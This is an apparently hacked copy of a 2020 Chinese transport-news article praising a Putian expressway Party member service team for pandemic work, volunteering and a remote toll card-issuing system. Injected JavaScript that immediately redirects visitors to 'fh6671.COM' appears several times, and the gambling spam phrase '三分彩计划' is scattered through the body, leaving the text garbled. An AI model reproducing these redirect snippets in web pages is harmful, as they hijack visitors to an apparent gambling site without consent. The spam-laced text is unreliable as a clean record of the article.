function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl();

三分彩计划

交通运输部主管  中国交通报社主办

中国交通新闻网三分彩计划  > 直通地方

【福建】莆田高速“一路帮”党员服务队——冲锋在前 守护畅安优美

2020-11-18 11:16:33 来源:中国交通新闻网 作者:何巧丹

function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl(); function jumurl(){ window.location.href = 'fh6671.COM' } setTimeout(jumurl,2000); jumurl(); 在福建高速集团莆田管理分公司(简称莆田高速)基层党组织中,有一张“金名片”熠熠生辉,那就是莆田高速“一路帮”党员服务队。在今年福建高速如火如荼开展党建“三个一”创建的关键节点,这支由5个片区分队、115名党员组成,关键时候“拉得出、顶得上、打得赢”的队伍,积极活跃在各窗口一线、各攻坚战场,成为莆田高速加强基层党组织建设的有力抓手,为莆田高速发展提供坚强组织保证,铺开了一幅幅党徽颗颗闪耀,党旗高高飘扬的美丽画卷。

“一路帮”党员服务队

道阻且长,行则将至,他们用责任书写担当

三分彩计划在今年疫情防控之初,莆田高速“一路帮”党员服务队全力做好防护物资保障,强化同地方政府的联防联控,及时成立1个临时党支部、10支党员突击队,60名党团员青年加入莆田市疫情防控志愿者队伍,以实际行动共克时艰,保证了公司防疫“4个零”的成果。疫情常态化防控之后,党员干部率先垂范,精准攻克服务难点,推进复工复产,通过加大创新力度、精准扶贫帮困、线上直播带货、热血抗疫等形式,助力答好发展“必答题”。

党员服务队抢修护栏

心揣责任,肩扛担当,在这个困难与挑战并存的特殊年,“一路帮”党员服务队步履不停,他们或奔赴在疫情防控、脱贫攻坚、复工复产等险重战场上,或奔赴在迎“国评”“省级文明单位创建”等急难战场上,他们变压力为动力,化动力为行动,用“主动干”奏出了和和奋斗最相符的同义语,和幸福最相通的和鸣,在服务运营、服务民生中让党性发光!

心有所往 终至始归,他们用拓新推动智造

他们,每天爬云台、钻隧道,夏天冒着炎热的酷署,冬天顶着凛冽的寒风,用细心保障了高速设备正常运转,用拓新智造出一项项创新成果,4个“五小”创新大赛名次,6个实用新型专利,10个软件著作权,一项项的数据源于一支敢想敢干敢为的党员服务队。在近期,这支以党员技术能手牵头的服务队又成功攻克了游洋收费所的远程发卡系统研发难题。

在当前新收费模式下,收费员除出口正常收费还要兼顾入口发卡,对于车流量较少、人员核定较少的收费所,人员的调配成为一大难题。如何更好优化资源配置,提高收费效率?带着这个问题,以党员牵头的“金牌工人创客室”绞尽脑汁,践履所学,经过半个多月的反复测试,通过在旧发卡机身上动个“小手术”,一套远程发卡系统应运而生。此系统将旧发卡机卷卡机构及卡口进行改造升级,对车道控制器的输出控制模式进行微小改动,同时增设可视化对讲、KVM等远控传输设备实现出口车道人工远程操作入口车道系统进行发卡,再通过发卡机自动出卡给司乘人员,目有效提高了收费人员的机动性能,又实现了修旧利废、节约成本,有效助力了公司转型升级提质增效。

远程发卡系统

与尔同行,与有荣焉,他们用服务传递温度

三分彩计划“有呼必应、有难必帮”是共产党员历久弥新的鲜明底色。技术攻关、应急保畅、路面维修、危困救助、扶贫帮困……莆田高速“一路帮”党员服务队用蚂蚁雄兵的力量深刻诠释了“高速温度”。

今年以来,“一路帮”党员服务队助力全方位高质量发展超越、全心全意为人民服务的过程中,涌现出一大批先进典型:“全国交通技术能手”赵辉凭借着“干一行爱一行、钻一行精一行”的热忱,带领金牌工人创客室以实干实效实现金牌工人一到N的过渡蝶变,让莆田公司创新之路越走越宽,越走越稳;“一路帮”党员志愿者郑建仙在危急关头挺身而出,带领班组人员勇救行车途中发病司机的事迹在人民日报等媒体广为传播;以党员为首的6户职工家庭获评“莆田市职工最美家庭”;党员徐海疆同志坚守初心使命,连续15年参与无偿献血,献血量达6000毫升,且被莆田市选为湄洲岛区域志愿者巡查队长......

三分彩计划他们——只是莆田高速“一路帮”党员服务队中的一个缩影,正是他们一路同行,用爱心搭起了“连心桥”,用点滴付出树立了先锋的旗帜,砥砺前行,才不断升华了党员在群众、职工心中的分量,守护了莆田高速的“畅安优美”。


中国交通新闻网版权及免责声明:
1、凡本网注明“来源:中国交通报”、“来源:中国交通新闻网” 的所有作品,版权均属于中国交通新闻网,未经本网授权,任何单位及个人不得转载、摘编或以其他方式使用上述作品。已经本网授权使用作品的,应在授权范围 内使用,并注明“来源:中国交通新闻网”。违反上述声明者,本网将追究其相关法律责任。
2、凡本网注明 “来源:XXX(非中国交通新闻网)” 的作品,均转载自其他媒体,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。
三分彩计划 3、如因作品内容、版权和其他问题需要同本网联系的,请在30日内进行。

新媒体

热门推荐更多>>

问计于民问计于网

三分彩计划围绕党中央、国务院重大决策部署和交通运输部党组中心工作,倾听群众呼声、查找突出问题、吸收基层智慧,更好服务人民、服务大局、服务基层。